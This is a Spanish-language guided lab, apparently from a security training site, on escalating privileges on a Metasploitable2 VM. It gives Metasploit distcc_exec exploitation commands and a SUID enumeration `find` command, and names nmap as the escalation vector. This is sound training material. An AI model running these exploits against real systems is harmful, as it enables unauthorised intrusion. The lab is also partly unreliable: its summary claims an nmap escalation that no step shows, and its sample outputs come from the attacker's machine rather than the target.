Realizar Escalada de Privilegios en una Máquina Linux con Nmap

NmapBeginner
Practicar Ahora

Introducción

En este laboratorio, aprenderás cómo realizar una escalada de privilegios en una máquina Linux después de obtener acceso exitosamente como usuario no root. Si bien hay muchos tutoriales disponibles en línea sobre escalada de privilegios en Windows, este laboratorio se centra específicamente en la escalada de privilegios en un sistema operativo Linux.

Este es un Guided Lab, que proporciona instrucciones paso a paso para ayudarte a aprender y practicar. Sigue las instrucciones cuidadosamente para completar cada paso y obtener experiencia práctica. Los datos históricos muestran que este es un laboratorio de nivel principiante con una tasa de finalización del 100%. Ha recibido una tasa de reseñas positivas del 95% por parte de los estudiantes.

Preparar el entorno

En este paso, iniciaremos los componentes necesarios del entorno de laboratorio, incluyendo el contenedor de Kali Linux y la máquina virtual Metasploitable2.

  1. Inicia la máquina virtual Metasploitable2 ejecutando el siguiente comando en la terminal:
sudo virsh start Metasploitable2

Espera a que la máquina objetivo se inicie, puede tardar de 1 a 3 minutos.

  1. Prueba si la máquina virtual se ha iniciado realizando un ping al nombre de host target:
ping 192.168.122.102

Presiona Ctrl+C para detener el ping.

  1. Inicia el contenedor de Kali Linux y entra en su shell bash:
docker run -ti --network host b5b709a49cd5 bash
  1. Dentro del contenedor de Kali, prueba la conectividad de red realizando un ping al nombre de host target:
ping 192.168.122.102

Presiona Ctrl+C para detener el ping.

Obtener acceso inicial a la máquina objetivo

En este paso, utilizaremos el Framework Metasploit (MSF) en el contenedor de Kali para obtener acceso inicial a la máquina objetivo Metasploitable2.

  1. Dentro del contenedor de Kali, inicia la consola de Metasploit:
cd ~
msfconsole
  1. Dentro de la consola de Metasploit, utiliza el módulo de explotación distcc_exec:
use exploit/unix/misc/distcc_exec
  1. Establece la dirección IP del host objetivo:
set RHOST 192.168.122.102
  1. Lanzar la explotación para obtener acceso a la máquina objetivo:
exploit

Después de una explotación exitosa, deberías ver una sesión de shell de comandos abierta, lo que indica que has obtenido acceso a la máquina objetivo.

Presiona Ctrl+D para salir de la consola de Metasploit y luego inicia la inspección

Verificar los privilegios del usuario actual

Después de obtener acceso inicial, necesitamos verificar los privilegios del usuario actual para determinar si es necesario una escalada adicional de privilegios.

  1. En primer lugar, si no estás en la consola de Metasploit, debes iniciar la consola de Metasploit:
cd ~
msfconsole
  1. Verifica el usuario actual:
whoami
  1. Verifica el ID de usuario y la información del grupo:
id

Si el ID de usuario no es 0 (root), necesitarás escalar privilegios para obtener acceso administrativo.

Presiona Ctrl+D para salir de la consola de Metasploit y luego inicia la inspección

Enumerar información del sistema

Antes de intentar una escalada de privilegios, necesitamos recopilar información sobre el sistema objetivo para identificar posibles vulnerabilidades.

  1. En primer lugar, si no estás en la consola de Metasploit, debes iniciar la consola de Metasploit:
cd ~
msfconsole
  1. Verifica la versión de la distribución Linux:
lsb_release -a

A continuación, un ejemplo de la salida que podrías ver:

[*] exec: lsb_release -a

No LSB modules are available.
Distributor ID: Kali
Description:    Kali GNU/Linux Rolling
Release:        2023.2
Codename:       kali-rolling
  1. Verifica la versión del kernel:
uname -a

A continuación, un ejemplo de la salida que podrías ver:

Linux iZj6ceecakbzgu9eomquhhZ 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64 GNU/Linux
  1. Encuentra archivos SUID que podrían ser potencialmente explotados para una escalada de privilegios:
find / -perm -u=s -type f 2> /dev/null

En la salida, deberías ver el binario /usr/bin/nmap, que tiene una conocida vulnerabilidad de escalada de privilegios en versiones antiguas. Presiona Ctrl+C para salir.

Presiona Ctrl+D para salir de la consola de Metasploit y luego inicia la inspección

Resumen

En este laboratorio, aprendiste cómo realizar una escalada de privilegios en una máquina Linux después de obtener acceso inicial como usuario no root. Comenzamos configurando el entorno de LabEx con el contenedor de Kali Linux y la máquina virtual Metasploitable2. Luego, utilizamos el Framework Metasploit para explotar la vulnerabilidad Distcc y obtener acceso inicial a la máquina objetivo.

Después de verificar que no éramos usuarios root, recopilamos información sobre el sistema objetivo, como la versión de la distribución Linux, la versión del kernel y los archivos SUID. Identificamos el binario de Nmap como una posible vulnerabilidad y lo explotamos para elevar nuestros privilegios a root.

Al completar este laboratorio, adquiriste experiencia práctica en el proceso de escalada de privilegios en sistemas Linux, que es una habilidad crítica en el campo de la ciberseguridad. También aprendiste cómo usar varios comandos de Linux para la enumeración y explotación del sistema, así como cómo aprovechar las vulnerabilidades en el software para obtener acceso elevado.